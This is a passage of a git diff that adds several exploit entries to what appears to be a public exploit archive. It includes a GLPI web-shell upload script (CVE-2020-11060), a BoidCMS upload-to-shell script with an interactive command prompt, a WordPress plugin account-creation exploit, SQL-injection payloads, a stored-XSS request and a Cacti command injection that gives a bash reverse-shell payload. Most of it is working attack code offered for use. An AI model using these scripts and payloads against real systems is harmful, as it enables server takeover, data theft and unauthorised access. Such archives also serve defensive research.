the server. + + Args: + wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. Defaults to '310'. + + Note: + Adjust the offset number to match the table number for wifi_networks. + This can be found by downloading a SQL dump and running: + zgrep -n "CREATE TABLE" glpi-backup-*.sql.gz | grep -n wifinetworks + """ + dump_target = f"{self.path}{self.__shell_name}" + print(f"[*] Dumping the database remotely at: {dump_target}") + self.__session.get( + f"{self.__url}/front/backup.php?dump=dump&offsettable={wifi_table_offset or '310'}&fichier={dump_target}" + ) + + print(f"[+] File 'dumped', accessible at: {self.shell_path}") + + def upload_rce(self, wifi_table_offset: str = None) -> str: + """ + Uploads the RCE (Remote Code Execution) shell to the target. + + Args: + wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. + + Returns: + str: A status message indicating the outcome of the upload. + """ + if not self.login(): + print("[-] Login error") + return + + print(f"[+] User {self.__user!r} is logged in.") + + # create timestamp + datemod = datetime.now().strftime("%Y-%m-%d %H:%M:%S") + + tick = 1 + while True: + print("-" * 25 + f" trial number {tick} " + "-" * 25) + + # create padding for ESSID + padding = "e" * tick + + self.wipe_networks(padding, datemod) + self.create_network(datemod) + self.edit_network(padding, datemod) + + self.__shell_name = ( + "".join(random.choice(string.ascii_letters) for _ in range(8)) + ".php" + ) + + print(f"[+] Current shellname: {self.__shell_name}") + + self.create_dump(wifi_table_offset) + if self.__shell_check(): + break + + tick += 1 + + print("-" * 66) + print(f"[+] RCE found after {tick} trials!") + + # Private methods + def __extract_csrf(self, html: str): + """Extract CSRF token from the provided HTML content.""" + return re.search( + pattern=r'name="_glpi_csrf_token" value="([a-f0-9]{32})"', string=html + ).group(1) + + def __shell_check(self) -> bool: + """Check if the uploaded shell is active and responding correctly.""" + r = self.__session.get( + url=self.shell_path, + params={"0": "echo HERE"}, + ) + shell_size = len(r.content) + print(f"[+] Shell size: {shell_size!s}") + if shell_size < 50: + print("[x] Too small, there is a problem with the choosen offset.") + return False + + return b"HERE" in r.content + + # Properties + @property + def path(self): + """With this property, every time you access self.path, it will dynamically generate and return the path string based on the current value of self.accessible_directory. This way, it will always be a "direct reference" to the value of self.accessible_directory.""" + if "win" in self.__platform.lower(): + return f"C:\\xampp\\htdocs\\{self.accessible_directory}\\" + else: + return f"/var/www/html/glpi/{self.accessible_directory}/" + + @property + def shell_path(self) -> str: + """Generate the complete path to the uploaded shell.""" + return f"{self.__url}/{self.accessible_directory}/{self.__shell_name}" + + +def execute( + url: str, + command: str, + timeout: float = None, +) -> str: + """ + Executes a given command on a remote server through a web shell. + + This function assumes a web shell has been previously uploaded to the target + server and sends a request to execute the provided command. It uses a unique + delimiter ("HoH") to ensure that the command output can be parsed and + returned without any additional data. + + Args: + url (str): The URL where the web shell is located on the target server. + command (str): The command to be executed on the target server. + timeout (float, optional): Maximum time, in seconds, for the request + to the server. Defaults to None, meaning no timeout. + + Returns: + str: The output of the executed command. Returns None if the URL or + command is not provided. + """ + if url is None or command is None: + return + + command = f"echo HoH&&{command}&&echo HoH" + + response = requests.get( + url=url, + params={ + "0": command, + }, + timeout=timeout, + verify=False, + ) + + # Use regex to find the content between "HoH" delimiters + if match := re.search( + pattern=r"HoH(.*?)HoH", string=response.text, flags=re.DOTALL + ): + return match.group(1).strip() + + +def main() -> None: + parser = argparse.ArgumentParser() + parser.add_argument("--url", help="Target URL.", required=True) + parser.add_argument("--user", help="Username.", default=None) + parser.add_argument("--password", help="Password.", default=None) + parser.add_argument("--platform", help="Target OS (windows/unix).", default=None) + parser.add_argument( + "--offset", help="Offset for table wifi_networks.", default=None + ) + parser.add_argument( + "--dir", + help="Accessible directory on the target.", + default="sound", + required=False, + ) # "sound" as default directory + + parser.add_argument("--command", help="Command to execute via RCE.", default=None) + + options = parser.parse_args() + + if options.command: + # We assume the given URL is the shell path if a command is provided. + + try: + response = execute(url=options.url, command=options.command, timeout=5) + except TimeoutError: + print(f"[x] Timeout received form target. Maybe your command failed.") + else: + print(f"[*] Response received from {options.url!r}:") + print(response) + finally: + return + + target = GlpiBrowser( + options.url, + user=options.user, + password=options.password, + platform=options.platform, + ) + + if not target.is_alive(): + return + + target.accessible_directory = options.dir + target.upload_rce(wifi_table_offset=options.offset) + + print( + f"[+] You can execute command remotely as: {execute(url=target.shell_path, command='whoami').strip()}@{execute(url=target.shell_path, command='hostname').strip()}" + ) + print("[+] Run this tool again with the desired command to inject:") + print( + f"\tpython3 CVE-2020-11060.py --url '{target.shell_path}' --command 'desired_command_here'" + ) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51728.txt b/exploits/php/webapps/51728.txt new file mode 100644 index 000000000..c71daf1db --- /dev/null +++ b/exploits/php/webapps/51728.txt @@ -0,0 +1,39 @@ +## Title: Online ID Generator 1.0 - Remote Code Execution (RCE) +## Author: nu11secur1ty +## Date: 08/31/2023 +## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc +## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip +## Reference: https://portswigger.net/web-security/sql-injection +## Reference: https://portswigger.net/web-security/file-upload +## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload + + +STATUS: HIGH-CRITICAL Vulnerability + +[+]Bypass login SQLi: +# In login form, for user: + +```mysql +nu11secur1ty' or 1=1# +``` + +[+]Shell Upload exploit: +## For system logo: +```php + +``` +[+]RCE Exploit +## Execution from the remote browser: +```URLhttp://localhost/id_generator/uploads/1693471560_info.php +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html) + +## Time spend: +00:10:00 \ No newline at end of file diff --git a/exploits/php/webapps/51729.txt b/exploits/php/webapps/51729.txt new file mode 100644 index 000000000..0580ff7f9 --- /dev/null +++ b/exploits/php/webapps/51729.txt @@ -0,0 +1,39 @@ +# Exploit Title: Clcknshop 1.0.0 - SQL Injection +# Exploit Author: CraCkEr +# Date: 16/08/2023 +# Vendor: Infosoftbd Solutions +# Vendor Homepage: https://infosoftbd.com/ +# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/ +# Demo: https://kidszone.clckn.shop/ +# Version: 1.0.0 +# Tested on: Windows 10 Pro +# Impact: Database Access +# CVE: CVE-2023-4708 +# CWE: CWE-89 - CWE-74 - CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + +Path: /collection/all + +GET parameter 'tag' is vulnerable to SQL Injection + +https://website/collection/all?tag=[SQLi] + +--- +Parameter: tag (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z +--- \ No newline at end of file diff --git a/exploits/php/webapps/51735.py b/exploits/php/webapps/51735.py new file mode 100755 index 000000000..eafee370a --- /dev/null +++ b/exploits/php/webapps/51735.py @@ -0,0 +1,100 @@ +# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation +# Google Dork: inurl:/user-public-account +# Date: 2023-09-04 +# Exploit Author: Revan Arifio +# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/ +# Version: <= 3.0.17 +# Tested on: Windows, Linux +# CVE : CVE-2023-4278 + +import requests +import os +import re +import time + +banner = """ + _______ ________ ___ ___ ___ ____ _ _ ___ ______ ___ + / ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \ + | | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) | + | | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ < + | |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) | + \_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/ + +====================================================================================================== +|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation || +|| Author : https://github.com/revan-ar || +|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ || +|| Support : https://www.buymeacoffee.com/revan.ar || +====================================================================================================== + +""" + + +print(banner) + +# get nonce +def get_nonce(target): + open_target = requests.get("{}/user-public-account".format(target)) + search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text) + if search_nonce[1] != None: + return search_nonce[1] + else: + print("Failed when getting Nonce :p") + + + +# privielege escalation +def privesc(target, nonce, username, password, email): + + req_data = { + "user_login":"{}".format(username), + "user_email":"{}".format(email), + "user_password":"{}".format(password), + "user_password_re":"{}".format(password), + "become_instructor":True, + "privacy_policy":True, + "degree":"", + "expertize":"", + "auditory":"", + "additional":[], + "additional_instructors":[], + "profile_default_fields_for_register":[], + "redirect_page":"{}/user-account/".format(target) + } + + start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data) + + if start.status_code == 200: + print("[+] Exploit Success !!") + else: + print("[+] Exploit Failed :p") + + + +# URL target +target = input("[+] URL Target: ") +print("[+] Starting Exploit") +plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target)) +plugin_version = re.search("Stable tag: (.+)", plugin_check.text) +int_version = plugin_version[1].replace(".", "") +time.sleep(1) + +if int(int_version) < 3018: + print("[+] Target is Vulnerable !!") + # Credential + email = input("[+] Email: ") + username = input("[+] Username: ") + password = input("[+] Password: ") + time.sleep(1) + print("[+] Getting Nonce...") + get_nonce = get_nonce(target) + # Get Nonce + if get_nonce != None: + print("[+] Success Getting Nonce: {}".format(get_nonce)) + time.sleep(1) + # Start PrivEsc + privesc(target, get_nonce, username, password, email) + # ---------------------------------- + +else: + print("[+] Target is NOT Vulnerable :p") \ No newline at end of file diff --git a/exploits/php/webapps/51736.txt b/exploits/php/webapps/51736.txt new file mode 100644 index 000000000..3e1ea0fca --- /dev/null +++ b/exploits/php/webapps/51736.txt @@ -0,0 +1,44 @@ +## Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution +## Author: nu11secur1ty +## Date: 09/04/2023 +## Vendor: https://webigniter.net/ +## Software: https://webigniter.net/demo +## Reference: https://portswigger.net/web-security/file-upload + + +## Description: +The media function suffers from file upload vulnerability. +The attacker can upload and he can execute remotely very dangerous PHP +files, by using any created account before this on this system. +Then he can do very malicious stuff with the server of this application. + +## Staus: HIGH-CRITICAL Vulnerability + +[+]Simple Exploit: +```PHP + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html) + +## Time spent: +00:15:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51737.txt b/exploits/php/webapps/51737.txt new file mode 100644 index 000000000..d2fd2ff2c --- /dev/null +++ b/exploits/php/webapps/51737.txt @@ -0,0 +1,48 @@ +# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI +# Date: 2023/09/05 +# CVE: CVE-2023-4634 +# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh +# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ +# Exploit: https://github.com/Patrowl/CVE-2023-4634/ +# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/ +# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/ +# Version: < 3.10 +# Tested on: 3.09 +# Description: +# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php + + +#LFI + +Steps to trigger conversion of a remote SVG + +Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references) + +Host 2 files : +- malicious.svg +- malicious.svg[1] + + +Payload: +For LFI, getting wp-config.php: + +Both malicious.svg and malicious.svg[1] on the remote FTP: + + +xmlns="http://www.w3.org/2000/svg"> + + + +Then trigger conversion with: +http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1 + + +# Directory listing or RCE: +To achieve Directory listing or even RCE, it is a little more complicated. + +Use exploit available here: +https://github.com/Patrowl/CVE-2023-4634/ + +# Note +Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration). \ No newline at end of file diff --git a/exploits/php/webapps/51738.txt b/exploits/php/webapps/51738.txt new file mode 100644 index 000000000..824bcbcad --- /dev/null +++ b/exploits/php/webapps/51738.txt @@ -0,0 +1,70 @@ +Exploit Title: coppermine-gallery 1.6.25 RCE +Application: coppermine-gallery +Version: v1.6.25 +Bugs: RCE +Technology: PHP +Vendor URL: https://coppermine-gallery.net/ +Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip +Date of found: 05.09.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps + + +1.First of All create php file content as and sequeze this file with zip. +$ cat >> test.php + +$ zip test.zip test.php + +1. Login to account +2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php +3. Upload zip file +4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php + + + +poc request + +POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1 +Host: localhost +Content-Length: 630 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c +Connection: close + +------WebKitFormBoundaryi1AopwPnBYPdzorF +Content-Disposition: form-data; name="plugin"; filename="test.zip" +Content-Type: application/zip + +PK +�����™b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux ��������� +PK +�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux ���������PK������N���j����� +------WebKitFormBoundaryi1AopwPnBYPdzorF +Content-Disposition: form-data; name="form_token" + +50982f2e64a7bfa63dbd912a7fdb4e1e +------WebKitFormBoundaryi1AopwPnBYPdzorF +Content-Disposition: form-data; name="timestamp" + +1693905214 +------WebKitFormBoundaryi1AopwPnBYPdzorF-- \ No newline at end of file diff --git a/exploits/php/webapps/51739.txt b/exploits/php/webapps/51739.txt new file mode 100644 index 000000000..02b0a5288 --- /dev/null +++ b/exploits/php/webapps/51739.txt @@ -0,0 +1,40 @@ +# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS +# Date: 2023-09-05 +# Exploit Author: Furkan Karaarslan +# Category : Webapps +# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php +# Version: 4.7 (REQUIRED) +# Tested on: Windows/Linux +---------------------------------------------------------------------------------------------------- +1-First install sonar music plugin. +2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist +3-Press the Add new playlist button +4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist +5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/ +6-Let's paste our xss payload in the comment section. Payload: +Bingoo + +Request: +POST /wp/wordpress/wp-comments-post.php HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 155 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1/wp/wordpress/album_slug/test/ +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486 +Connection: close + +comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5 \ No newline at end of file diff --git a/exploits/php/webapps/51740.txt b/exploits/php/webapps/51740.txt new file mode 100644 index 000000000..8067228ca --- /dev/null +++ b/exploits/php/webapps/51740.txt @@ -0,0 +1,65 @@ +# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options +# Date: 2023-07-03 +# Exploit Author: Antonio Francesco Sardella +# Vendor Homepage: https://www.cacti.net/ +# Software Link: https://www.cacti.net/info/downloads +# Version: Cacti 1.2.24 +# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container +# CVE: CVE-2023-39362 +# Category: WebApps +# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp +# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application +# Vulnerability discovered and reported by: Antonio Francesco Sardella + +======================================================================================= +Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362) +======================================================================================= + +----------------- +Executive Summary +----------------- + +In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. + +------- +Exploit +------- + +Prerequisites: + - The attacker is authenticated. + - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs". + - A Device that supports SNMP can be used. + - Net-SNMP Graphs can be used. + - snmp module of PHP is not installed. + +Example of an exploit: + - Go to "Console" > "Create" > "New Device". + - Create a Device that supports SNMP version 1 or 2. + - Ensure that the Device has Graphs with one or more templates of: + - "Net-SNMP - Combined SCSI Disk Bytes" + - "Net-SNMP - Combined SCSI Disk I/O" + - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite) + - In the "SNMP Options", for the "SNMP Community String" field, use a value like this: + public\' ; touch /tmp/m3ssap0 ; \' + - Click the "Create" button. + - Check under /tmp the presence of the created file. + +To obtain a reverse shell, a payload like the following can be used. + + public\' ; bash -c "exec bash -i &>/dev/tcp// <&1" ; \' + +A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host). + +---------- +Root Cause +---------- + +A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html). + +---------- +References +---------- + + - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp + - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html + - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application \ No newline at end of file diff --git a/exploits/php/webapps/51741.py b/exploits/php/webapps/51741.py new file mode 100755 index 000000000..7af2a65e9 --- /dev/null +++ b/exploits/php/webapps/51741.py @@ -0,0 +1,64 @@ +#!/usr/bin/python3 +# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability +# Date: 08/21/2023 +# Exploit Author: 1337kid +# Vendor Homepage: https://boidcms.github.io/#/ +# Software Link: https://boidcms.github.io/BoidCMS.zip +# Version: <= 2.0.0 +# Tested on: Ubuntu +# CVE : CVE-2023-38836 + +import requests +import re +import argparse + +parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836') +parser.add_argument("-u", "--url", help="website url") +parser.add_argument("-l", "--user", help="admin username") +parser.add_argument("-p", "--passwd", help="admin password") +args = parser.parse_args() +base_url=args.url +user=args.user +passwd=args.passwd + +def showhelp(): + print(parser.print_help()) + exit() +if base_url == None: showhelp() +elif user == None: showhelp() +elif passwd == None: showhelp() + +with requests.Session() as s: + req=s.get(f'{base_url}/admin') + token=re.findall('[a-z0-9]{64}',req.text) + form_login_data={ + "username":user, + "password":passwd, + "login":"Login", + } + form_login_data['token']=token + s.post(f'{base_url}/admin',data=form_login_data) + #=========== File upload to RCE + req=s.get(f'{base_url}/admin?page=media') + token=re.findall('[a-z0-9]{64}',req.text) + form_upld_data={ + "token":token, + "upload":"Upload" + } + #==== php shell + php_code=['GIF89a;\n',''] + with open('shell.php','w') as f: + f.writelines(php_code) + #==== + file = {'file' : open('shell.php','rb')} + s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data) + req=s.get(f'{base_url}/media/shell.php') + if req.status_code == '404': + print("Upload failed") + exit() + print(f'Shell uploaded to "{base_url}/media/shell.php"') + while 1: + cmd=input("cmd >> ") + if cmd=='exit': exit() + req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd}) + print(req.text) \ No newline at end of file diff --git a/exploits/php/webapps/51743.txt b/exploits/php/webapps/51743.txt new file mode 100644 index 000000000..54ecbc147 --- /dev/null +++ b/exploits/php/webapps/51743.txt @@ -0,0 +1,39 @@ +Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF +Application: Webedition CMS +Version: v2.9.8.8 +Bugs: Blind SSRF +Technology: PHP +Vendor URL: https://www.webedition.org/ +Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 +Date of found: 07.09.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +write https://youserver/test.xml to we_cmd[0] parameter + +poc request + +POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1 +Host: localhost +Content-Length: 141 +sec-ch-ua: +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +sec-ch-ua-platform: "" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300 +Connection: close + +we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3 \ No newline at end of file diff --git a/exploits/php/webapps/51744.txt b/exploits/php/webapps/51744.txt new file mode 100644 index 000000000..629b7048d --- /dev/null +++ b/exploits/php/webapps/51744.txt @@ -0,0 +1,48 @@ +## Title: Limo Booking Software v1.0 - CORS +## Author: nu11secur1ty +## Date: 09/08/2023 +## Vendor: https://www.phpjabbers.com/ +## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo +## Reference: https://portswigger.net/web-security/cors + +## Description: +The application implements an HTML5 cross-origin resource sharing +(CORS) policy for this request that allows access from any domain. +The application allowed access from the requested origin http://wioydcbiourl.com +Since the Vary: Origin header was not present in the response, reverse +proxies and intermediate servers may cache it. This may enable an +attacker to carry out cache poisoning attacks. The attacker can get +some of the software resources of the victim without the victim +knowing this. + +STATUS: HIGH Vulnerability + +[+]Test Payload: +``` +GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795 +HTTP/1.1 +Host: demo.phpjabbers.com +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 +Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Origin: http://wioydcbiourl.com +Referer: http://demo.phpjabbers.com/ +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html) + +## Time spent: +00:35:00 \ No newline at end of file diff --git a/exploits/php/webapps/51745.txt b/exploits/php/webapps/51745.txt new file mode 100644 index 000000000..fc34b1e03 --- /dev/null +++ b/exploits/php/webapps/51745.txt @@ -0,0 +1,75 @@ +## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi +## Author: nu11secur1ty +## Date: 09/10/2023 +## Vendor: https://www.phpjabbers.com/ +## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The location_id parameter appears to be vulnerable to SQL injection +attacks. A single quote was submitted in the location_id parameter, +and a database error message was returned. Two single quotes were then +submitted and the error message disappeared. +The attacker easily can steal all information from the database of +this web application! +WARNING! All of you: Be careful what you buy! This will be your responsibility! + +STATUS: HIGH-CRITICAL Vulnerability + +[+]Payload: +```mysql +--- +Parameter: location_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') +AND 1347=1347 AND ('MVss'='MVss&traveling=from + + Type: error-based + Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (GTID_SUBSET) + Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') +AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT +(ELT(9416=9416,1))),0x71706b7071),9416) AND +('dOqc'='dOqc&traveling=from + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') +AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND +('EEYQ'='EEYQ&traveling=from +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html) + +## Time spent: +01:47:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ 